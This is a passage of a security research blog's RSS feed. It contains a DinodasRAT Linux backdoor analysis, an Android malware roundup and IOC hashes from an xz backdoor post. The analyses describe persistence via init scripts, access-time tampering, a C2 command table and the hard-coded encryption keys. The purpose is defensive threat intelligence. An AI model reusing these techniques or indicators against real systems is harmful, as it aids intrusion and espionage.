  1142. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">4f0cf1d2a2d44b75079b3ea5ed28fe54</a><br />
  1143. 72e8163734d586b6360b24167a3aff2a3c961efb<br />
  1144. 319feb5a9cddd81955d915b5632b4a5f8f9080281fb46e2f6d69d53f693c23ae</p>
  1145. <p><strong>Debian Sid</strong><br />
  1146. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">53d82bb511b71a5d4794cf2d8a2072c1</a><br />
  1147. 8a75968834fc11ba774d7bbdc566d272ff45476c<br />
  1148. 605861f833fc181c7cdcabd5577ddb8989bea332648a8f498b4eef89b8f85ad4</p>
  1149. <p><strong>Related files</strong><br />
  1150. d302c6cb2fa1c03c710fa5285651530f,<br />
  1151. 4f0cf1d2a2d44b75079b3ea5ed28fe54,<br />
  1152. 153df9727a2729879a26c1995007ffbc,<br />
  1153. 53d82bb511b71a5d4794cf2d8a2072c1,<br />
  1154. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">212ffa0b24bb7d749532425a46764433</a>, liblzma_la-crc64-fast.o</p>
  1155. <p><strong>Analyzed artefacts</strong><br />
  1156. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">35028f4b5c6673d6f2e1a80f02944fb2</a>, bad-3-corrupt_lzma2.xz<br />
  1157. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">b4dd2661a7c69e85f19216a6dbbb1664</a>, build-to-host.m4<br />
  1158. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">540c665dfcd4e5cfba5b72b4787fec4f</a>, good-large_compressed.lzma</p>
  1159. ]]></content:encoded>
  1160. <wfw:commentRss></wfw:commentRss>
  1161. <slash:comments>2</slash:comments>
  1162. <media:content xmlns:media="" url="" width="2666" height="1500"><media:keywords>full</media:keywords></media:content>
  1163. <media:content xmlns:media="" url="" width="1024" height="576"><media:keywords>large</media:keywords></media:content>
  1164. <media:content xmlns:media="" url="" width="300" height="169"><media:keywords>medium</media:keywords></media:content>
  1165. <media:content xmlns:media="" url="" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1166. </item>
  1167. <item>
  1168. <title>DinodasRAT Linux implant targeting entities worldwide</title>
  1169. <link></link>
  1170. <comments></comments>
  1171. <dc:creator><![CDATA[Anderson Leite, Lisandro Ubiedo]]></dc:creator>
  1172. <pubDate>Thu, 28 Mar 2024 13:00:51 +0000</pubDate>
  1173. <category><![CDATA[Malware descriptions]]></category>
  1174. <category><![CDATA[Backdoor]]></category>
  1175. <category><![CDATA[DinodasRAT]]></category>
  1176. <category><![CDATA[Linux]]></category>
  1177. <category><![CDATA[Malware]]></category>
  1178. <category><![CDATA[Malware Descriptions]]></category>
  1179. <category><![CDATA[Malware Technologies]]></category>
  1180. <category><![CDATA[RedHat]]></category>
  1181. <category><![CDATA[Trojan]]></category>
  1182. <category><![CDATA[Ubuntu]]></category>
  1183. <category><![CDATA[Unix and macOS malware]]></category>
  1184. <guid isPermaLink="false"></guid>
  1186. <description><![CDATA[In this article, we share our analysis of a recent version of the DinodasRAT implant for Linux, which may have been active since 2022.]]></description>
  1187. <content:encoded><![CDATA[<p><img width="990" height="400" src="" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>DinodasRAT, also known as <a href="" target="_blank" rel="noopener">XDealer</a>, is a multi-platform backdoor written in C++ that offers a range of capabilities. This RAT allows the malicious actor to surveil and harvest sensitive data from a target&#8217;s computer. A Windows version of this RAT was used in attacks against government entities in Guyana, and documented by ESET researchers as <a href="" target="_blank" rel="noopener">Operation Jacana</a>.</p>
  1188. <p>In early October 2023, after the ESET publication, we discovered a new Linux version of DinodasRAT. Sample artifacts suggest that this version (V10 according to the attackers&#8217; versioning system) may have started operating in 2022, although the first known Linux variant (V7), which has still not been publicly described, dates back to 2021. In this analysis, we&#8217;ll discuss technical details of one Linux implant used by the attackers.</p>
  1189. <h2 id="initial-infection-overview">Initial infection overview</h2>
  1190. <p>The DinodasRAT Linux implant primarily targets Red Hat-based distributions and Ubuntu Linux. When first executed, it creates a hidden file in the same directory as the executable, following the format &#8220;.[executable_name].mu&#8221;. This file is used as a sort of mutex in order to ensure the implant only runs one instance and only allows it to proceed if it is able to successfully create this file.</p>
  1191. <p>The backdoor maintains persistence and is launched as follows:</p>
  1192. <div id="attachment_112287" style="width: 823px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112287" class="size-full wp-image-112287" src="" alt="Backdoor main code" width="813" height="665" srcset=" 813w, 300w, 768w, 428w, 740w, 342w, 800w" sizes="(max-width: 813px) 100vw, 813px" /></a><p id="caption-attachment-112287" class="wp-caption-text">Backdoor main code</p></div>
  1193. <p>The backdoor establishes persistence and starts with the following steps:</p>
  1194. <ol>
  1195. <li>Direct execution without arguments;
  1196. <ul>
  1197. <li>It first executes without any arguments, which makes it run in the background by calling the &#8220;daemon&#8221; function from Linux.</li>
  1198. </ul>
  1199. </li>
  1200. <li>Establishing persistence on the infected system by utilizing SystemV or SystemD startup scripts (detailed in the next section).</li>
  1201. <li>Executing itself again with the parent process ID (PPID) as an argument;
  1202. <ul>
  1203. <li>The newly created process (child) continues the backdoor infection while the parent process waits.</li>
  1204. <li>This technique not only gives Dinodas the ability to verify that it has executed correctly, but also makes it harder to detect with debugging and monitoring tools.</li>
  1205. </ul>
  1206. </li>
  1207. </ol>
  1208. <h2 id="victim-id-generation-and-persistence">Victim ID generation and persistence</h2>
  1209. <p>Before establishing contact with the C2 server, the backdoor gathers information about the infected machine and infection time to create a unique identifier for the victim&#8217;s machine. Notably, the attackers do not collect any user-specific data to generate this UID. The UID typically includes:</p>
  1210. <ul>
  1211. <li>Date of infection;</li>
  1212. <li>MD5 hash of the dmidecode command output (a detailed report of the infected system&#8217;s hardware);</li>
  1213. <li>Randomly generated number as ID;</li>
  1214. <li>Backdoor version.</li>
  1215. </ul>
  1216. <p>The unique identifier has the format: <strong>Linux_{DATE}_{HASH}_{RAND_NUM}_{VERSION}</strong>.</p>
  1217. <div id="attachment_112288" style="width: 763px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112288" class="size-full wp-image-112288" src="" alt="Machine unique identifier generation" width="753" height="176" srcset=" 753w, 300w, 740w" sizes="(max-width: 753px) 100vw, 753px" /></a><p id="caption-attachment-112288" class="wp-caption-text">Machine unique identifier generation</p></div>
  1218. <p>Next, the implant stores all the local information about the victim&#8217;s ID, privilege level, and any other relevant details in a hidden file called &#8220;<em>/etc/.netc.conf</em>&#8220;. This profile file contains the current collected metadata of the backdoor. If the file does not exist, Dinodas will create it, adhering to the <strong>Section</strong> and <strong>Key:Value</strong> structure.</p>
  1219. <div id="attachment_112289" style="width: 615px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112289" class="size-full wp-image-112289" src="" alt="DinodasRAT profile configuration" width="605" height="59" srcset=" 605w, 300w" sizes="(max-width: 605px) 100vw, 605px" /></a><p id="caption-attachment-112289" class="wp-caption-text">DinodasRAT profile configuration</p></div>
  1220. <p>It also ensures that any access to this file or to itself (when reading its own filepath) does not update the &#8220;access&#8221; time in the <em>stat</em> structure, which contains the access timestamp of a given file in the file system. It does this by using the &#8220;<strong>touch</strong>&#8221; command with the &#8220;<strong>-d</strong>&#8221; parameter to modify this metadata.</p>
  1221. <div id="attachment_112290" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112290" class="size-large wp-image-112290" src="" alt="Replacing the original file access time code" width="1024" height="256" srcset=" 1024w, 300w, 768w, 740w, 1118w, 800w, 1142w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112290" class="wp-caption-text">Replacing the original file access time code</p></div>
  1222. <div id="attachment_112291" style="width: 688px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112291" class="size-full wp-image-112291" src="" alt="Modified access time in the backdoor executable" width="678" height="163" srcset=" 678w, 300w" sizes="(max-width: 678px) 100vw, 678px" /></a><p id="caption-attachment-112291" class="wp-caption-text">Modified access time in the backdoor executable</p></div>
  1223. <p>The DinodasRAT Linux version takes advantage of the two versions of Linux service managers to establish persistence on an affected system: Systemd and SystemV. When the malware is launched, a function is called to determine the type of Linux distribution the victim is running. There are currently two flavors of distros that the implant targets based on its readings of &#8220;<em>/proc/version</em>&#8221; – RedHat and Ubuntu 16/18. However, the malware could infect any distro that supports either of the above versions of system service managers. Once the system is recognized, it installs a suitable init script that provides persistence for the RAT. This script is executed once the network setup is complete and launches the backdoor.</p>
  1224. <div id="attachment_112292" style="width: 890px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112292" class="size-full wp-image-112292" src="" alt="SystemD service registration" width="880" height="243" srcset=" 880w, 300w, 768w, 740w, 800w" sizes="(max-width: 880px) 100vw, 880px" /></a><p id="caption-attachment-112292" class="wp-caption-text">SystemD service registration</p></div>
  1225. <p>For RedHat, RedHat-based systems and Ubuntu, the service initiation scripts used for persistence check for the presence of the chkconfig binary. This is a way to indicate that the initialization is done with SysV instead of Systemd. If it doesn&#8217;t exist, the implant will open or create the script file &#8220;/etc/rc.d/rc.local&#8221; and append itself to the execution chain that runs the backdoor during system initialization. If it exists, the SysV route is implied and the malware creates the persistence scripts in &#8220;/etc/init.d&#8221;.</p>
  1226. <h2 id="c2-communication">C2 Communication</h2>
  1227. <p>The Linux version of DinodasRAT communicates with the C2 in the same way as the Windows version. It communicates over TCP or UDP. The C2 domain is hard-coded into the binary:</p>
  1228. <div id="attachment_112293" style="width: 472px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112293" class="size-full wp-image-112293" src="" alt="C2 server and port are hard-coded into the implant" width="462" height="311" srcset=" 462w, 300w, 416w" sizes="(max-width: 462px) 100vw, 462px" /></a><p id="caption-attachment-112293" class="wp-caption-text">C2 server and port are hard-coded into the implant</p></div>
  1229. <p>DinodasRAT has a timed interval for sending the information back to the C2, although it is not a fixed interval for all users or all connections. If the user executing the implant is root (EUID = 0), the implant doesn&#8217;t wait to send the information back to the C2. In the case of a non-superuser with the configuration set to <em>checkroot</em>, it will wait two minutes for a &#8220;short&#8221; wait (default) and 10 hours for a &#8220;long&#8221; wait. The &#8220;long&#8221; wait is triggered when there&#8217;s a remote connection to the infected server coming from one of the C2-configured IP addresses.</p>
  1230. <p>To communicate with the C2 server and send any information, the implant follows a network packet structure with many fields, but here are the relevant fields of the structure:</p>
  1231. <div id="attachment_112294" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112294" class="size-large wp-image-112294" src="" alt="Simplified version of Dinodas network packet" width="1024" height="315" srcset=" 1024w, 300w, 768w, 1536w, 1137w, 740w, 909w, 800w, 1955w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112294" class="wp-caption-text">Simplified version of Dinodas network packet</p></div>
  1232. <p>Here&#8217;s a list of C2 commands that DinodasRAT recognizes:</p>
  1233. <table width="100%">
  1234. <tbody>
  1235. <tr>
  1236. <td style="background-color: #cccccc;padding-left: 5px" width="10%"><strong>ID</strong></td>
  1237. <td style="background-color: #cccccc;padding-left: 5px" width="30%"><strong>Function</strong></td>
  1238. <td style="background-color: #cccccc;padding-left: 5px" width="60%"><strong>Command</strong></td>
  1239. </tr>
  1240. <tr>
  1241. <td style="padding-left: 5px">0x02</td>
  1242. <td style="padding-left: 5px">DirClass</td>
  1243. <td style="padding-left: 5px">List the directory content.</td>
  1244. </tr>
  1245. <tr>
  1246. <td style="padding-left: 5px">0x03</td>
  1247. <td style="padding-left: 5px">DelDir</td>
  1248. <td style="padding-left: 5px">Delete directory.</td>
  1249. </tr>
  1250. <tr>
  1251. <td style="padding-left: 5px">0x05</td>
  1252. <td style="padding-left: 5px">UpLoadFile</td>
  1253. <td style="padding-left: 5px">Upload a file to the C2.</td>
  1254. </tr>
  1255. <tr>
  1256. <td style="padding-left: 5px">0x06</td>
  1257. <td style="padding-left: 5px">StopDownLoadFile</td>
  1258. <td style="padding-left: 5px">Stop file upload.</td>
  1259. </tr>
  1260. <tr>
  1261. <td style="padding-left: 5px">0x08</td>
  1262. <td style="padding-left: 5px">DownLoadFile</td>
  1263. <td style="padding-left: 5px">Download remote file to system.</td>
  1264. </tr>
  1265. <tr>
  1266. <td style="padding-left: 5px">0x09</td>
  1267. <td style="padding-left: 5px">StopDownFile</td>
  1268. <td style="padding-left: 5px">Stop file download.</td>
  1269. </tr>
  1270. <tr>
  1271. <td style="padding-left: 5px">0x0E</td>
  1272. <td style="padding-left: 5px">DealChgIp</td>
  1273. <td style="padding-left: 5px">Change C2 remote address.</td>
  1274. </tr>
  1275. <tr>
  1276. <td style="padding-left: 5px">0x0F</td>
  1277. <td style="padding-left: 5px">CheckUserLogin</td>
  1278. <td style="padding-left: 5px">Check logged-in users.</td>
  1279. </tr>
  1280. <tr>
  1281. <td style="padding-left: 5px">0x11</td>
  1282. <td style="padding-left: 5px">EnumProcess</td>
  1283. <td style="padding-left: 5px">Enumerate running processes.</td>
  1284. </tr>
  1285. <tr>
  1286. <td style="padding-left: 5px">0x12</td>
  1287. <td style="padding-left: 5px">StopProcess</td>
  1288. <td style="padding-left: 5px">Kill a running process.</td>
  1289. </tr>
  1290. <tr>
  1291. <td style="padding-left: 5px">0x13</td>
  1292. <td style="padding-left: 5px">EnumService</td>
  1293. <td style="padding-left: 5px">Use chkconfig and enumerate all available services.</td>
  1294. </tr>
  1295. <tr>
  1296. <td style="padding-left: 5px">0x14</td>
  1297. <td style="padding-left: 5px">ControlService</td>
  1298. <td style="padding-left: 5px">Control an available service. If 1 is passed as an argument, it will start a service, 0 will stop it, while 2 will stop and delete the service.</td>
  1299. </tr>
  1300. <tr>
  1301. <td style="padding-left: 5px">0x18</td>
  1302. <td style="padding-left: 5px">DealExShell</td>
  1303. <td style="padding-left: 5px">Execute shell command and send its output to C2.</td>
  1304. </tr>
  1305. <tr>
  1306. <td style="padding-left: 5px">0x19</td>
  1307. <td style="padding-left: 5px">ExecuteFile</td>
  1308. <td style="padding-left: 5px">Execute a specified file path in a separate thread.</td>
  1309. </tr>
  1310. <tr>
  1311. <td style="padding-left: 5px">0x1A</td>
  1312. <td style="padding-left: 5px">DealProxy</td>
  1313. <td style="padding-left: 5px">Proxy C2 communication through a remote proxy.</td>
  1314. </tr>
  1315. <tr>
  1316. <td style="padding-left: 5px">0x1B</td>
  1317. <td style="padding-left: 5px">StartShell</td>
  1318. <td style="padding-left: 5px">Drop a shell for the threat actor to interact with.</td>
  1319. </tr>
  1320. <tr>
  1321. <td style="padding-left: 5px">0x1C</td>
  1322. <td style="padding-left: 5px">ReRestartShell</td>
  1323. <td style="padding-left: 5px">Restart the previously mentioned shell.</td>
  1324. </tr>
  1325. <tr>
  1326. <td style="padding-left: 5px">0x1D</td>
  1327. <td style="padding-left: 5px">StopShell</td>
  1328. <td style="padding-left: 5px">Stop the execution of the current shell.</td>
  1329. </tr>
  1330. <tr>
  1331. <td style="padding-left: 5px">0x1E</td>
  1332. <td style="padding-left: 5px">WriteShell</td>
  1333. <td style="padding-left: 5px">Write commands into the current shell or create one if necessary.</td>
  1334. </tr>
  1335. <tr>
  1336. <td style="padding-left: 5px">0x27</td>
  1337. <td style="padding-left: 5px">DealFile</td>
  1338. <td style="padding-left: 5px">Download and set up a new version of the implant.</td>
  1339. </tr>
  1340. <tr>
  1341. <td style="padding-left: 5px">0x28</td>
  1342. <td style="padding-left: 5px">DealLocalProxy</td>
  1343. <td style="padding-left: 5px">Send &#8220;ok&#8221;.</td>
  1344. </tr>
  1345. <tr>
  1346. <td style="padding-left: 5px">0x2B</td>
  1347. <td style="padding-left: 5px">ConnectCtl</td>
  1348. <td style="padding-left: 5px">Control connection type.</td>
  1349. </tr>
  1350. <tr>
  1351. <td style="padding-left: 5px">0x2C</td>
  1352. <td style="padding-left: 5px">ProxyCtl</td>
  1353. <td style="padding-left: 5px">Control proxy type.</td>
  1354. </tr>
  1355. <tr>
  1356. <td style="padding-left: 5px">0x2D</td>
  1357. <td style="padding-left: 5px">Trans_mode</td>
  1358. <td style="padding-left: 5px">Set or get file transfer mode (TCP/UDP).</td>
  1359. </tr>
  1360. <tr>
  1361. <td style="padding-left: 5px">0x2E</td>
  1362. <td style="padding-left: 5px">Uninstall</td>
  1363. <td style="padding-left: 5px">Uninstall the implant and delete any artifacts from the system.</td>
  1364. </tr>
  1365. </tbody>
  1366. </table>
  1367. <div id="attachment_112295" style="width: 299px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112295" class="size-full wp-image-112295" src="" alt="Command to uninstall itself from the infected system" width="289" height="233" /></a><p id="caption-attachment-112295" class="wp-caption-text">Command to uninstall itself from the infected system</p></div>
  1368. <h2 id="encryption">Encryption</h2>
  1369. <p>The Linux version of DinodasRAT also shares encryption characteristics with the Windows version. For encryption and decryption of communication between the implant and the C2, as well as encryption of data, it uses Pidgin&#8217;s <a href="" target="_blank" rel="noopener">libqq</a> qq_crypt library functions. This library uses the Tiny Encryption Algorithm (<a href="" target="_blank" rel="noopener">TEA</a>) in <a href="" target="_blank" rel="noopener">CBC</a> mode to cipher and decipher the data, which makes it fairly easy to port between platforms. The Linux implant also shares two of the keys used in the Windows version:</p><pre class="crayon-plain-tag">For C2 encryption:   A1 A1 18 AA 10 F0 FA 16 06 71 B3 08 AA AF 31 A1
  1370. For name encryption: A0 21 A1 FA 18 E0 C1 30 1F 9F C0 A1 A0 A6 6F B1</pre><p>
  1371. <h2 id="infrastructure">Infrastructure</h2>
  1372. <table width="100%">
  1373. <tbody>
  1374. <tr>
  1375. <td style="background-color: #cccccc;padding-left: 5px" width="25%"><strong>Domain</strong></td>
  1376. <td style="background-color: #cccccc;padding-left: 5px" width="25%"><strong>IP</strong></td>
  1377. <td style="background-color: #cccccc;padding-left: 5px" width="20%"><strong>First seen</strong></td>
  1378. <td style="background-color: #cccccc;padding-left: 5px" width="10%"><strong>ASN</strong></td>
  1379. <td style="background-color: #cccccc;padding-left: 5px" width="20%"><strong>Registrar</strong></td>
  1380. </tr>
  1381. <tr>
  1382. <td style="padding-left: 5px">update.centos-yum[.]com</td>
  1383. <td style="padding-left: 5px">199.231.211[.]19</td>
  1384. <td style="padding-left: 5px">May 4, 2022</td>
  1385. <td style="padding-left: 5px">18978</td>
  1386. <td style="padding-left: 5px">, Inc.</td>
  1387. </tr>
  1388. </tbody>
  1389. </table>
  1390. <p>The infrastructure currently in use by the Linux versions of DinodasRAT appeared to be up and running at the time this implant was being analyzed. We identified one IP address resolving for both the Windows and Linux variants&#8217; C2 domains. The Windows version of DinodasRAT uses the domain[.]com, which resolves to the IP address 199.231.211[.]19. This IP address also resolves to update.centos-yum[.]com, which (interestingly enough) uses the same pattern of operating system update subdomain and domain.</p>
  1391. <h2 id="victims">Victims</h2>
  1392. <p>In our telemetry data and continuous monitoring of this threat since October 2023, we&#8217;ve observed that the most affected countries and territories are China, Taiwan, Turkey and Uzbekistan.</p>
  1393. <p>All Kaspersky products detect this Linux variant as <strong>HEUR:Backdoor.Linux.Dinodas.a.</strong></p>
  1394. <h2 id="conclusion">Conclusion</h2>
  1395. <p>In October 2023, ESET published an article about a campaign dubbed Operation Jacana targeting Windows users. As part of our ongoing monitoring efforts, we discovered that the Jacana operators possess and act on their ability to infect Linux infrastructure with a new and previously unknown and undetected Linux DindoasRAT variant, whose code and networking indicators of compromise overlap with the Windows samples described by ESET. They do not collect user information to manage infections. Instead, hardware-specific information is collected and used to generate a UID, demonstrating that DinodasRAT&#8217;s primary use case is to gain and maintain access via Linux servers rather than reconnaissance.</p>
  1396. <p>The backdoor is fully functional, granting the operator complete control over the infected machine, enabling data exfiltration and espionage.</p>
  1397. <p>A more detailed analysis of the latest DinodasRAT versions is available to customers of our private <a href="" target="_blank" rel="noopener">Threat Intelligence reports</a>. If you have any questions, please contact <strong><a href="" target="_blank" rel="noopener"></a>.</strong></p>
  1398. <h2 id="indicators-of-compromise">Indicators of compromise</h2>
  1399. <p><strong>Host-based:</strong></p>
  1400. <ul>
  1401. <li><a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">8138f1af1dc51cde924aa2360f12d650</a></li>
  1402. <li><a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">decd6b94792a22119e1b5a1ed99e8961</a></li>
  1403. </ul>
  1404. <p><strong>Network-based:</strong></p>
  1405. <ul>
  1406. <li><a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">update.centos-yum[.]com</a> (199.231.211[.]19)</li>
  1407. </ul>
  1408. ]]></content:encoded>
  1409. <wfw:commentRss></wfw:commentRss>
  1410. <slash:comments>0</slash:comments>
  1411. <media:content xmlns:media="" url="" width="2600" height="1321"><media:keywords>full</media:keywords></media:content>
  1412. <media:content xmlns:media="" url="" width="1024" height="520"><media:keywords>large</media:keywords></media:content>
  1413. <media:content xmlns:media="" url="" width="300" height="152"><media:keywords>medium</media:keywords></media:content>
  1414. <media:content xmlns:media="" url="" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1415. </item>
  1416. <item>
  1417. <title>Android malware, Android malware and more Android malware</title>
  1418. <link></link>
  1419. <comments></comments>
  1420. <dc:creator><![CDATA[GReAT]]></dc:creator>
  1421. <pubDate>Wed, 20 Mar 2024 11:00:34 +0000</pubDate>
  1422. <category><![CDATA[Malware reports]]></category>
  1423. <category><![CDATA[Google Android]]></category>
  1424. <category><![CDATA[Malware]]></category>
  1425. <category><![CDATA[RAT Trojan]]></category>
  1426. <category><![CDATA[Spyware]]></category>
  1427. <category><![CDATA[Trojan]]></category>
  1428. <category><![CDATA[Mobile threats]]></category>
  1429. <guid isPermaLink="false"></guid>
  1431. <description><![CDATA[In this report, we share our latest Android malware findings: the Tambir spyware, Dwphon downloader and Gigabud banking Trojan.]]></description>
  1432. <content:encoded><![CDATA[<p><img width="990" height="400" src="" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><h2 id="introduction">Introduction</h2>
  1433. <p>Malware for mobile devices is something we come across very often. <a href="">In 2023</a>, our technologies blocked 33.8 million malware, adware, and riskware attacks on mobile devices. One of 2023&#8217;s most resonant attacks was <a href="">Operation Triangulation</a>, targeting iOS, but that was rather a unique case. Among the mobile platforms, Android remains the most popular target operating system for cybercriminals. Last month, we wrote a total of four private crimeware reports on Android malware, three of which are summarized below. </p>
  1434. <p>To learn more about our crimeware reporting service, you can contact us at <a href="" target="_blank" rel="noopener"></a>.</p>
  1435. <h2 id="tambir">Tambir</h2>
  1436. <p>Tambir is an Android backdoor that targets users in Turkey. It disguises itself as an IPTV app, but does not manifest any such functionality. Instead, it is a full-fledged spyware application that collects SMS messages, keystrokes, etc.</p>
  1437. <p>Upon starting, the application shows a screen that asks the user in Turkish to enable the accessibility service. Once it is granted all the permissions, the app obtains a C2 address from a public source, such as Telegram, ICQ or Twitter/X. Next, the application shapeshifts by changing its icon to that of YouTube.</p>
  1438. <div id="attachment_112126" style="width: 316px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112126" class="size-full wp-image-112126" src="" alt="Encrypted C2 address in a chat invitation" width="306" height="365" srcset=" 306w, 252w, 168w, 293w, 235w" sizes="(max-width: 306px) 100vw, 306px" /></a><p id="caption-attachment-112126" class="wp-caption-text">Encrypted C2 address in a chat invitation</p></div>
  1439. <p>Tambir supports more then 30 commands that it can retrieve from the C2. These include starting and stopping the keylogger, running an application specified by the attacker, sending SMS messages, dialing a number and so on.</p>
  1440. <p>We found certain similarities between Tambir and the <a href="" target="_blank" rel="noopener">GodFather malware</a>. They both target users in Turkey and both support Telegram for retrieving a C2 server address. However, Tambir has a much richer feature set.</p>
  1441. <h2 id="dwphon">Dwphon</h2>
  1442. <p>In November 2023, we stumbled upon an Android malware variant targeting mobile phones by various Chinese OEM manufacturers. Their products were primarily intended for the Russian market. The same malware earlier had been found in the firmware of a kids&#8217; smart watch by an Israeli manufacturer distributed mainly in Europe and the Middle East.</p>
  1443. <p>Dwphon comes as a component of the system update application and exhibits many characteristics of pre-installed Android malware. For example, it collects device and personal information, as well as information about third-party applications installed on the device. The exact infection path is unclear, but there is an assumption that the infected application was incorporated into the firmware as a result of a possible supply chain attack.</p>
  1444. <p>The malware itself consists of a number of modules that provide a range of functions:</p>
  1445. <ul>
  1446. <li>Main module. Collects system information (e.g. IMSI, system language, etc.) and sends it to the C2. Commands that can be received are related to installing, downloading and deleting apps on the device, downloading files, and showing popups, among others.</li>
  1447. <li>DsSdk module. Another module that collects device information. The module has its own C2 and is unable to receive commands.</li>
  1448. <li>ExtEnabler module. This module starts and monitors other applications. Part of the module&#8217;s functionality is sending a broadcast message when an application is started. Some of the samples we investigated did not contain any receiver code. We did, however, find one sample that contained it. This sample includes the <a href="" target="_blank" rel="noopener">Triada Trojan</a>, which suggests a link between Dwphon and Triada, although there is insufficient evidence to support this.</li>
  1449. </ul>
  1450. <h2 id="gigabud">Gigabud</h2>
  1451. <p>Gigabud is an Android RAT (Remote Access Trojan), active since at least mid-2022 and first discovered in January 2023. Focused on stealing banking credentials from individuals in Southeast Asia, it initially mimicked a local airline app, but later crossed borders into other countries, such as Peru, and also changed functionality to fake loan malware.</p>
  1452. <p>Gigabud is written in Kotlin, and obfuscated with Dexguard and later Virbox. Its various versions mimic apps created by companies in Thailand and Peru among others. Upon starting, the application shows the login screen of the app it mimics and subsequently sends the credentials, along with device information, to the C2. Next, it shows a virtual assistant, which guides the victim to apply for a loan.</p>
  1453. <p>It then continues by requesting the accessibility feature to be enabled – if it isn&#8217;t already. It needs this to steal credentials and mimic touch events for bypassing 2FA.</p>
  1454. <div id="attachment_112129" style="width: 1026px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112129" class="size-full wp-image-112129" src="" alt="Scheme of the captured data" width="1016" height="414" srcset=" 1016w, 300w, 768w, 859w, 740w, 687w, 800w" sizes="(max-width: 1016px) 100vw, 1016px" /></a><p id="caption-attachment-112129" class="wp-caption-text">Scheme of the captured data</p></div>
  1455. <p>Apart from stealing credentials, Gigabud embeds a screen recording module. The main functionality is stealing credentials from the infected device. It does this by streaming the screen to the C2 over WebSocket or RTMP.</p>
  1456. <p>Gigabud contains various Chinese language artifacts. For example, the log messages are written in Chinese, the APK signature is in Chinese, and the C2 servers are located in China.</p>
  1457. <h2 id="conclusion">Conclusion</h2>
  1458. <p>In 2023, we detected more than 1.3 million unique malicious installation packages targeting the Android platform and distributed in various ways. Users can protect themselves by not downloading apps from unofficial app marketplaces and by carefully reviewing the permissions that apps request. Frequently, apps do not embed any exploitation functionality and thus solely rely on the user giving them permissions. Additionally, antimalware tools help to keep your Android device clean. </p>
  1459. <p>If you would like to stay up to date on the latest TTPs being used by criminals, or if you have questions about our private reports, you can contact us at <a href="" target="_blank" rel="noopener"></a>.</p>
  1460. <h2 id="indicators-of-compromise">Indicators of compromise</h2>
  1461. <p><strong>Gigabud</strong><br />
  1462. <a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">043020302ea8d134afbd5bd37c05d2a8</a><br />
  1463. <a href=";utm_medium=SL&amp;utm_campaign=SL target=" rel="noopener">0960de9d425b5157720f59c2901d4e3b</a><br />
  1464. <a href=";utm_medium=SL&amp;utm_campaign=SL target=" rel="noopener">0677a090eb28837b1bbf3e6ab1822fdd</a></p>
  1465. <p><strong>Dwphon</strong><br />
  1466. <a href=";utm_medium=SL&amp;utm_campaign=SL target=" rel="noopener">042f041108a79ac07d7b3165531faa9a</a><br />
  1467. <a href=";utm_medium=SL&amp;utm_campaign=SL target=" rel="noopener">1796e678498bf9a067c43769f4096488</a><br />
  1468. <a href=";utm_medium=SL&amp;utm_campaign=SL target=" rel="noopener">274b8d86042d94a6ca6823841fec6d2c</a></p>
  1469. <p><strong>Tambir</strong><br />
  1470. <a href=";utm_medium=SL&amp;utm_campaign=SL target=" rel="noopener">04807757a54ce0fbc8326ea8b11f8169</a><br />
  1471. <a href=";utm_medium=SL&amp;utm_campaign=SL target=" rel="noopener">06148a2e5828e6844c2a1a74030d22b6</a><br />
  1472. <a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">098dac0668497d9707045bc1e10ced93</a></p>
  1473. ]]></content:encoded>
  1474. <wfw:commentRss></wfw:commentRss>
  1475. <slash:comments>0</slash:comments>
  1476. <media:content xmlns:media="" url="" width="1200" height="600"><media:keywords>full</media:keywords></media:content>
  1477. <media:content xmlns:media="" url="" width="1024" height="512"><media:keywords>large</media:keywords></media:content>
  1478. <media:content xmlns:media="" url="" width="300" height="150"><media:keywords>medium</media:keywords></media:content>
  1479. <media:content xmlns:media="" url="" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1480. </item>
  1481. <item>
  1482. <title>Threat landscape for industrial automation systems. H2 2023</title>
  1483. <link></link>
  1484. <comments></comments>
  1485. <dc:creator><![CDATA[Kaspersky ICS CERT]]></dc:creator>
  1486. <pubDate>Tue, 19 Mar 2024 10:00:20 +0000</pubDate>
  1487. <category><![CDATA[Industrial threats]]></category>
